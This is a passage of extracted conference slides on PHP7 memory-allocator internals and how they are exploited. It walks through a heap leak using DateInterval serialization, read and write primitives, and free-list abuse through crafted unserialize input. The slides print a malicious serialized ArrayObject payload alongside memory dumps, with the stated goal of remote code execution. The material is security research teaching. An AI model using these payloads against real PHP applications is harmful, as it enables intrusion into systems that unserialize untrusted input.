![Page 68: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/68.jpg)
emalloc(size)
bin_num = size2bin(size)
if NULL == heap->free_slots[bin_num] init_bin(heap, bin_num)
return pop(heap->free_slots[bin_num])
![Page 69: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/69.jpg)
emallocCHUNKchunk descriptorfree_slots
page_info
16
…32
.
![Page 70: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/70.jpg)
efree(ptr)
chunk = ptr & MASK_2M page_num = (ptr & (! MASK_2M)) >> OFFSET_4K bin = page2bin(chunk, page) push(chunk->heap->free_slots[bin], ptr)
![Page 71: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/71.jpg)
efreeCHUNKchunk descriptorfree_slots
page_info
16
…32
.
![Page 72: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/72.jpg)
Allocator Take Away
• Allocation predictability • Impossible free() arbitrary memory – Bit operations – Lookup in page descriptor
• Abuse free list pointer – arbitrary write –Will explain in few slides
.
![Page 73: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/73.jpg)
EXPLOIT
(GETTING THINGS DONE)
![Page 74: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/74.jpg)
Exploitation Stages
• Leak • Read • Write • Exec
.
![Page 75: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/75.jpg)
Leak
• Abuse the Allocator ☺ • Roughly based on @i0n1c’s method • Serialize freed object • Allocator override • Read more freed data
.
![Page 76: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/76.jpg)
Leak Theory
• Allocator free list • first sizeof(void*) point to next slot
• Read freed object • Read via pointer to next slot – i.e. read prev freed object
.
![Page 77: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/77.jpg)
DateInterval
.
![Page 78: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/78.jpg)
DateInterval
![Page 79: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/79.jpg)
Heap Address Leak
• Allocate DateInterval • Allocate object to leak - string • Free both objects • Allocator point DateInterval to string • Allocator overwrite string with pointers • Serialize
.
![Page 80: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/80.jpg)
![Page 81: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/81.jpg)
DateInterval
![Page 82: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/82.jpg)
DateInterval
![Page 83: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/83.jpg)
DateInterval
.
![Page 84: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/84.jpg)
Read Memory
• If you control a zval – forge a DateInterval • If you don’t – Free DatePeriod object – Set _php_date_period.start->tz_abbr to
memory – serialization - pointer to strcpy – More info in paper
.
![Page 85: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/85.jpg)
Write Memory
• free() strings • String contain pointers • Abuse free list – inc/dec => point to free slot
• Allocate memory • Allocation of arbitrary pointer
.
![Page 86: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/86.jpg)
Freeing Strings
• Unserialize hash table (array) • Use same key twice – e.g. a:2:{s:4:”AAAA”;i:0;s:4:”AAAA”;i:0;}
• Second time - key freed
.
![Page 87: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/87.jpg)
Abuse Possible
• Slot next – first field
• Refcount is first field • e.g. _zend_object
• UAF – add/dec ref • Actually inc/dec next
.
![Page 88: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/88.jpg)
[Restricted] ONLY for designated groups and individuals
Abusing Free List…s:31:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";i:0;s:31:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";a:2:{s:31:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";i:0;s:31:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";a:0:{}}i:3;C:11:"ArrayObject":18:{x:i:0;r:11;;m:r:2;}i:4;r:11;i:5;r:11;i:6;r:11;i:7;r:11;i:8;r:11;i:9;r:11;i:10;r:11;i:11;…
0xb5c531e0: 0xb5c53270 0x80000001 0x00000012 0xfffffffe 0xb5c531f0: 0xb72170bc 0x00000000 0x00000000 0x00000008 0xb5c53200: 0xffffffff 0x00000000 0xb6d3fca0 0x00414141 0xb5c53210: 0x00000002 0x00000007 0x0000000a 0xfffffff8 0xb5c53220: 0xb5c5f2c0 0x00000001 0x00000001 0x00000008 0xb5c53230: 0x00000000 0x00000000 0xb6d3fca0 0x00000000 0xb5c53240: 0x00000001 0x00000006 0xb727e264 0x0000001f 0xb5c53250: 0x41414141 0x41414141 0x41414141 0x41414141 0xb5c53260: 0x41414141 0x41414141 0x41414141 0x00414141 0xb5c53270: 0xb5c532d0 0x00000006 0xb727e264 0x0000001f 0xb5c53280: 0x41414141 0x41414141 0x41414141 0x41414141 0xb5c53290: 0x41414141 0x41414141 0x41414141 0x00414141 0xb5c532a0: 0x00000002 0x00000007 0x00000012 0xfffffffe 0xb5c532b0: 0xb72170bc 0x00000000 0x00000000 0x00000008 0xb5c532c0: 0xffffffff 0x00000000 0xb6d3fca0 0x00000000 0xb5c532d0: 0xb5c53300 0x00000000 0x00000000 0x00000000
heap->free_list[bin_num]
![Page 89: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/89.jpg)
[Restricted] ONLY for designated groups and individuals
Abusing Free List…s:31:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";i:0;s:31:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";a:2:{s:31:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";i:0;s:31:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";a:0:{}}i:3;C:11:"ArrayObject":18:{x:i:0;r:11;;m:r:2;}i:4;r:11;i:5;r:11;i:6;r:11;i:7;r:11;i:8;r:11;i:9;r:11;i:10;r:11;i:11;…
0xb5c531e0: 0xb5c53272 0x80000001 0x00000012 0xfffffffe 0xb5c531f0: 0xb72170bc 0x00000000 0x00000000 0x00000008 0xb5c53200: 0xffffffff 0x00000000 0xb6d3fca0 0x00414141 0xb5c53210: 0x00000002 0x00000007 0x0000000a 0xfffffff8 0xb5c53220: 0xb5c5f2c0 0x00000001 0x00000001 0x00000008 0xb5c53230: 0x00000000 0x00000000 0xb6d3fca0 0x00000000 0xb5c53240: 0x00000001 0x00000006 0xb727e264 0x0000001f 0xb5c53250: 0x41414141 0x41414141 0x41414141 0x41414141 0xb5c53260: 0x41414141 0x41414141 0x41414141 0x00414141 0xb5c53270: 0xb5c532d0 0x00000006 0xb727e264 0x0000001f 0xb5c53280: 0x41414141 0x41414141 0x41414141 0x41414141 0xb5c53290: 0x41414141 0x41414141 0x41414141 0x00414141 0xb5c532a0: 0x00000002 0x00000007 0x00000012 0xfffffffe 0xb5c532b0: 0xb72170bc 0x00000000 0x00000000 0x00000008 0xb5c532c0: 0xffffffff 0x00000000 0xb6d3fca0 0x00000000 0xb5c532d0: 0xb5c53300 0x00000000 0x00000000 0x00000000
heap->free_list[bin_num]
![Page 90: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/90.jpg)
[Restricted] ONLY for designated groups and individuals
Abusing Free List…s:31:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";i:0;s:31:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";a:2:{s:31:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";i:0;s:31:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";a:0:{}}i:3;C:11:"ArrayObject":18:{x:i:0;r:11;;m:r:2;}i:4;r:11;i:5;r:11;i:6;r:11;i:7;r:11;i:8;r:11;i:9;r:11;i:10;r:11;i:11;…
0xb5c531e0: 0xb5c53274 0x80000001 0x00000012 0xfffffffe 0xb5c531f0: 0xb72170bc 0x00000000 0x00000000 0x00000008 0xb5c53200: 0xffffffff 0x00000000 0xb6d3fca0 0x00414141 0xb5c53210: 0x00000002 0x00000007 0x0000000a 0xfffffff8 0xb5c53220: 0xb5c5f2c0 0x00000001 0x00000001 0x00000008 0xb5c53230: 0x00000000 0x00000000 0xb6d3fca0 0x00000000 0xb5c53240: 0x00000001 0x00000006 0xb727e264 0x0000001f 0xb5c53250: 0x41414141 0x41414141 0x41414141 0x41414141 0xb5c53260: 0x41414141 0x41414141 0x41414141 0x00414141 0xb5c53270: 0xb5c532d0 0x00000006 0xb727e264 0x0000001f 0xb5c53280: 0x41414141 0x41414141 0x41414141 0x41414141 0xb5c53290: 0x41414141 0x41414141 0x41414141 0x00414141 0xb5c532a0: 0x00000002 0x00000007 0x00000012 0xfffffffe 0xb5c532b0: 0xb72170bc 0x00000000 0x00000000 0x00000008 0xb5c532c0: 0xffffffff 0x00000000 0xb6d3fca0 0x00000000 0xb5c532d0: 0xb5c53300 0x00000000 0x00000000 0x00000000
heap->free_list[bin_num]
![Page 91: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/91.jpg)
[Restricted] ONLY for designated groups and individuals
Abusing Free List…s:31:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";i:0;s:31:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";a:2:{s:31:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";i:0;s:31:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";a:0:{}}i:3;C:11:"ArrayObject":18:{x:i:0;r:11;;m:r:2;}i:4;r:11;i:5;r:11;i:6;r:11;i:7;r:11;i:8;r:11;i:9;r:11;i:10;r:11;i:11;…
0xb5c531e0: 0xb5c53276 0x80000001 0x00000012 0xfffffffe 0xb5c531f0: 0xb72170bc 0x00000000 0x00000000 0x00000008 0xb5c53200: 0xffffffff 0x00000000 0xb6d3fca0 0x00414141 0xb5c53210: 0x00000002 0x00000007 0x0000000a 0xfffffff8 0xb5c53220: 0xb5c5f2c0 0x00000001 0x00000001 0x00000008 0xb5c53230: 0x00000000 0x00000000 0xb6d3fca0 0x00000000 0xb5c53240: 0x00000001 0x00000006 0xb727e264 0x0000001f 0xb5c53250: 0x41414141 0x41414141 0x41414141 0x41414141 0xb5c53260: 0x41414141 0x41414141 0x41414141 0x00414141 0xb5c53270: 0xb5c532d0 0x00000006 0xb727e264 0x0000001f 0xb5c53280: 0x41414141 0x41414141 0x41414141 0x41414141 0xb5c53290: 0x41414141 0x41414141 0x41414141 0x00414141 0xb5c532a0: 0x00000002 0x00000007 0x00000012 0xfffffffe 0xb5c532b0: 0xb72170bc 0x00000000 0x00000000 0x00000008 0xb5c532c0: 0xffffffff 0x00000000 0xb6d3fca0 0x00000000 0xb5c532d0: 0xb5c53300 0x00000000 0x00000000 0x00000000
heap->free_list[bin_num]
![Page 92: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/92.jpg)
[Restricted] ONLY for designated groups and individuals
Abusing Free List…s:31:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";i:0;s:31:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";a:2:{s:31:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";i:0;s:31:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";a:0:{}}i:3;C:11:"ArrayObject":18:{x:i:0;r:11;;m:r:2;}i:4;r:11;i:5;r:11;i:6;r:11;i:7;r:11;i:8;r:11;i:9;r:11;i:10;r:11;i:11;…
0xb5c531e0: 0xb5c53278 0x80000001 0x00000012 0xfffffffe 0xb5c531f0: 0xb72170bc 0x00000000 0x00000000 0x00000008 0xb5c53200: 0xffffffff 0x00000000 0xb6d3fca0 0x00414141 0xb5c53210: 0x00000002 0x00000007 0x0000000a 0xfffffff8 0xb5c53220: 0xb5c5f2c0 0x00000001 0x00000001 0x00000008 0xb5c53230: 0x00000000 0x00000000 0xb6d3fca0 0x00000000 0xb5c53240: 0x00000001 0x00000006 0xb727e264 0x0000001f 0xb5c53250: 0x41414141 0x41414141 0x41414141 0x41414141 0xb5c53260: 0x41414141 0x41414141 0x41414141 0x00414141 0xb5c53270: 0xb5c532d0 0x00000006 0xb727e264 0x0000001f 0xb5c53280: 0x41414141 0x41414141 0x41414141 0x41414141 0xb5c53290: 0x41414141 0x41414141 0x41414141 0x00414141 0xb5c532a0: 0x00000002 0x00000007 0x00000012 0xfffffffe 0xb5c532b0: 0xb72170bc 0x00000000 0x00000000 0x00000008 0xb5c532c0: 0xffffffff 0x00000000 0xb6d3fca0 0x00000000 0xb5c532d0: 0xb5c53300 0x00000000 0x00000000 0x00000000
heap->free_list[bin_num]
![Page 93: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/93.jpg)
[Restricted] ONLY for designated groups and individuals
Abusing Free List…s:31:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";i:0;s:31:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";a:2:{s:31:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";i:0;s:31:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";a:0:{}}i:3;C:11:"ArrayObject":18:{x:i:0;r:11;;m:r:2;}i:4;r:11;i:5;r:11;i:6;r:11;i:7;r:11;i:8;r:11;i:9;r:11;i:10;r:11;i:11;…
0xb5c531e0: 0xb5c5327a 0x80000001 0x00000012 0xfffffffe 0xb5c531f0: 0xb72170bc 0x00000000 0x00000000 0x00000008 0xb5c53200: 0xffffffff 0x00000000 0xb6d3fca0 0x00414141 0xb5c53210: 0x00000002 0x00000007 0x0000000a 0xfffffff8 0xb5c53220: 0xb5c5f2c0 0x00000001 0x00000001 0x00000008 0xb5c53230: 0x00000000 0x00000000 0xb6d3fca0 0x00000000 0xb5c53240: 0x00000001 0x00000006 0xb727e264 0x0000001f 0xb5c53250: 0x41414141 0x41414141 0x41414141 0x41414141 0xb5c53260: 0x41414141 0x41414141 0x41414141 0x00414141 0xb5c53270: 0xb5c532d0 0x00000006 0xb727e264 0x0000001f 0xb5c53280: 0x41414141 0x41414141 0x41414141 0x41414141 0xb5c53290: 0x41414141 0x41414141 0x41414141 0x00414141 0xb5c532a0: 0x00000002 0x00000007 0x00000012 0xfffffffe 0xb5c532b0: 0xb72170bc 0x00000000 0x00000000 0x00000008 0xb5c532c0: 0xffffffff 0x00000000 0xb6d3fca0 0x00000000 0xb5c532d0: 0xb5c53300 0x00000000 0x00000000 0x00000000
heap->free_list[bin_num]
![Page 94: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/94.jpg)
[Restricted] ONLY for designated groups and individuals
Abusing Free List…s:31:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";i:0;s:31:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";a:2:{s:31:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";i:0;s:31:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";a:0:{}}i:3;C:11:"ArrayObject":18:{x:i:0;r:11;;m:r:2;}i:4;r:11;i:5;r:11;i:6;r:11;i:7;r:11;i:8;r:11;i:9;r:11;i:10;r:11;i:11;…
0xb5c531e0: 0xb5c5327c 0x80000001 0x00000012 0xfffffffe 0xb5c531f0: 0xb72170bc 0x00000000 0x00000000 0x00000008 0xb5c53200: 0xffffffff 0x00000000 0xb6d3fca0 0x00414141 0xb5c53210: 0x00000002 0x00000007 0x0000000a 0xfffffff8 0xb5c53220: 0xb5c5f2c0 0x00000001 0x00000001 0x00000008 0xb5c53230: 0x00000000 0x00000000 0xb6d3fca0 0x00000000 0xb5c53240: 0x00000001 0x00000006 0xb727e264 0x0000001f 0xb5c53250: 0x41414141 0x41414141 0x41414141 0x41414141 0xb5c53260: 0x41414141 0x41414141 0x41414141 0x00414141 0xb5c53270: 0xb5c532d0 0x00000006 0xb727e264 0x0000001f 0xb5c53280: 0x41414141 0x41414141 0x41414141 0x41414141 0xb5c53290: 0x41414141 0x41414141 0x41414141 0x00414141 0xb5c532a0: 0x00000002 0x00000007 0x00000012 0xfffffffe 0xb5c532b0: 0xb72170bc 0x00000000 0x00000000 0x00000008 0xb5c532c0: 0xffffffff 0x00000000 0xb6d3fca0 0x00000000 0xb5c532d0: 0xb5c53300 0x00000000 0x00000000 0x00000000
heap->free_list[bin_num]
![Page 95: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/95.jpg)
[Restricted] ONLY for designated groups and individuals
Abusing Free List…s:31:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";i:0;s:31:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";a:2:{s:31:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";i:0;s:31:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";a:0:{}}i:3;C:11:"ArrayObject":18:{x:i:0;r:11;;m:r:2;}i:4;r:11;i:5;r:11;i:6;r:11;i:7;r:11;i:8;r:11;i:9;r:11;i:10;r:11;i…
0xb5c531e0: 0xb5c5327e 0x80000001 0x00000012 0xfffffffe 0xb5c531f0: 0xb72170bc 0x00000000 0x00000000 0x00000008 0xb5c53200: 0xffffffff 0x00000000 0xb6d3fca0 0x00414141 0xb5c53210: 0x00000002 0x00000007 0x0000000a 0xfffffff8 0xb5c53220: 0xb5c5f2c0 0x00000001 0x00000001 0x00000008 0xb5c53230: 0x00000000 0x00000000 0xb6d3fca0 0x00000000 0xb5c53240: 0x00000001 0x00000006 0xb727e264 0x0000001f 0xb5c53250: 0x41414141 0x41414141 0x41414141 0x41414141 0xb5c53260: 0x41414141 0x41414141 0x41414141 0x00414141 0xb5c53270: 0xb5c532d0 0x00000006 0xb727e264 0x0000001f 0xb5c53280: 0x41414141 0x41414141 0x41414141 0x41414141 0xb5c53290: 0x41414141 0x41414141 0x41414141 0x00414141 0xb5c532a0: 0x00000002 0x00000007 0x00000012 0xfffffffe 0xb5c532b0: 0xb72170bc 0x00000000 0x00000000 0x00000008 0xb5c532c0: 0xffffffff 0x00000000 0xb6d3fca0 0x00000000 0xb5c532d0: 0xb5c53300 0x00000000 0x00000000 0x00000000
heap->free_list[bin_num]
![Page 96: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/96.jpg)
[Restricted] ONLY for designated groups and individuals
Abusing Free List…s:31:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";i:0;s:31:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";a:2:{s:31:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";i:0;s:31:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";a:0:{}}i:3;C:11:"ArrayObject":18:{x:i:0;r:11;;m:r:2;}i:4;r:11;i:5;r:11;i:6;r:11;i:7;r:11;i:8;r:11;i:9;r:11;i:10;r:11;…
0xb5c531e0: 0xb5c53280 0x80000001 0x00000012 0xfffffffe 0xb5c531f0: 0xb72170bc 0x00000000 0x00000000 0x00000008 0xb5c53200: 0xffffffff 0x00000000 0xb6d3fca0 0x00414141 0xb5c53210: 0x00000002 0x00000007 0x0000000a 0xfffffff8 0xb5c53220: 0xb5c5f2c0 0x00000001 0x00000001 0x00000008 0xb5c53230: 0x00000000 0x00000000 0xb6d3fca0 0x00000000 0xb5c53240: 0x00000001 0x00000006 0xb727e264 0x0000001f 0xb5c53250: 0x41414141 0x41414141 0x41414141 0x41414141 0xb5c53260: 0x41414141 0x41414141 0x41414141 0x00414141 0xb5c53270: 0xb5c532d0 0x00000006 0xb727e264 0x0000001f 0xb5c53280: 0x41414141 0x41414141 0x41414141 0x41414141 0xb5c53290: 0x41414141 0x41414141 0x41414141 0x00414141 0xb5c532a0: 0x00000002 0x00000007 0x00000012 0xfffffffe 0xb5c532b0: 0xb72170bc 0x00000000 0x00000000 0x00000008 0xb5c532c0: 0xffffffff 0x00000000 0xb6d3fca0 0x00000000 0xb5c532d0: 0xb5c53300 0x00000000 0x00000000 0x00000000
heap->free_list[bin_num]
![Page 97: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/97.jpg)
Code Execution
• forge a zval – override callback • If not –write primitive
.
![Page 98: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/98.jpg)
Exploit Take Away
• Use the allocator • Re-usable primitives • Primitives => remote exploit
.
![Page 100: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/100.jpg)
Conclusions
• High level > low level • New design – new vulns • Exploiter friendly allocator • unserialize => practically unauthorized
RCE
.
![Page 101: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/101.jpg)
More Info
• http://blog.checkpoint.com • http://bugs.php.net • https://nikic.github.io • Twitter: @yannayli
QUESTIONS?.